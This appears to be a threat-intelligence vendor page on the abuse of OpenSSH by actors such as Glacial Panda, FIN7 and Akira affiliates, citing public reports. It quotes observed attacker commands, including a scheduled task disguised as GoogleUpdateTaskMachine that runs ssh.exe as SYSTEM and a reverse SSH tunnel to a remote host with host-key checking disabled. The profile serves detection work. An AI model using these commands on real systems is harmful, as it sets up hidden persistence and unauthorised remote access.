OpenSSH is a legitimate open-source SSH suite, not a distinct malware family. Threat actors abuse its remote-access and file-transfer functionality and deploy modified or trojanized builds as backdoors on Windows and Linux systems.
Modified Windows OpenSSH server builds associated with TRITON actor tooling include a self-contained executable with built-in OpenSSL, a fixed configuration, and hard-coded cryptographic key pairs. These builds accept inbound SSH connections on a nonstandard port and launch a custom-compiled SFTP server component for file transfer. OpenSSH-based backdoor tooling has also been identified in Akira-affiliated intrusions.
Glacial Panda deploys trojanized OpenSSH tools on compromised Linux hosts to log user authentication events and track remote connections to other hosts, supporting lateral movement through a technique called ShieldSlide. FIN7, also known as Sangria Tempest, has used OpenSSH alongside Impacket to move laterally and deploy Clop ransomware. These uses distinguish malicious modifications and operational abuse from ordinary OpenSSH installations; ransomware deployment is an operator activity, not an intrinsic OpenSSH capability.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
"Glacial Panda deploys trojanized OpenSSH tools on compromised Linux hosts to log user authentication events and support lateral movement by tracking remote connections to other hosts in a technique CrowdStrike calls ShieldSlide."
...observed the group using OpenSSH and Impacket to move laterally and deploy Clop ransomware.
Looking for modified OpenSSH binaries with non-standard PE metadata, seen used heavily by TRITON actor
23 distinct techniques documented for this family, organized by ATT&CK tactic.
SCHTASKS /CREATE /RU SYSTEM /SC HOURLY ... /TN GoogleUpdateTaskMachine /TR cmd /c FOR /L %N IN () DO (C:\ProgramData\ssh\ssh.exe ... ) Scheduled Task/Job [ T1053 ]
“In another terminal, run ssh root@localhost -p 2222. For the password, enter alpine.”
he installed OpenSSH Server and Tailscale, joined the victim's machine to his private Tailscale network, and set up key-based SSH
SCHTASKS /CREATE /RU SYSTEM /SC HOURLY ... /TN GoogleUpdateTaskMachine /TR cmd /c FOR /L %N IN () DO (C:\ProgramData\ssh\ssh.exe ... ) Scheduled Task/Job [ T1053 ]
“In another terminal, run ssh root@localhost -p 2222. For the password, enter alpine.”
C:\ProgramData\ssh\ssh.exe -o "StrictHostKeyChecking no" root@<remote_ip> -p 443 -R 25369 -NCqf -i "C:\Windows\temp\syslog.txt" ... Remote services:SSH [ T1021 ]
...форвардинг локальних мережевих портів (зокрема, 445, 3389, 22) на віддалений сервер...
...форвардинг локальних мережевих портів (зокрема, 445, 3389, 22) на віддалений сервер...
«SSH как замена VPN... один SSH туннель как VPN замена без загрузки бинарников на скомпрометированный хост»; «sshuttle... перехватывает трафик ... и проксирует через SSH».
The group uses reverse SSH tunnels with -R port forwarding and tools including GOST, rsocx, cloudflared, and localtonet to redirect traffic.
...за допомогою легітимних програм OPENSSH і TOR, що забезпечували форвардинг локальних мережевих портів...
OpenSSH is installed from GitHub with msiexec.exe or downloaded using certutil.exe; PowerShell Invoke-WebRequest retrieves remote payloads.
Apart from using AnyDesk, TeamViewer, OpenSSH, MobaXTerm as Remote Administration Tools...
1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
6 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Legitimate OpenSSH binaries/tools are trojanized and deployed on compromised Linux hosts to log authentication events and facilitate lateral movement by monitoring/leveraging remote connections.
Included only because the reference explicitly describes this OpenSSH instance as a backdoor associated with Akira activity. It does not establish that legitimate OpenSSH software generally is malicious or explain whether this instance was modified.
A legitimate remote administration utility abused for lateral movement and remote command execution; in this context, used by FIN7 in operations associated with Clop ransomware deployment.
Legitimate SSH tooling abused for remote access/lateral movement as part of the ransomware deployment chain.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.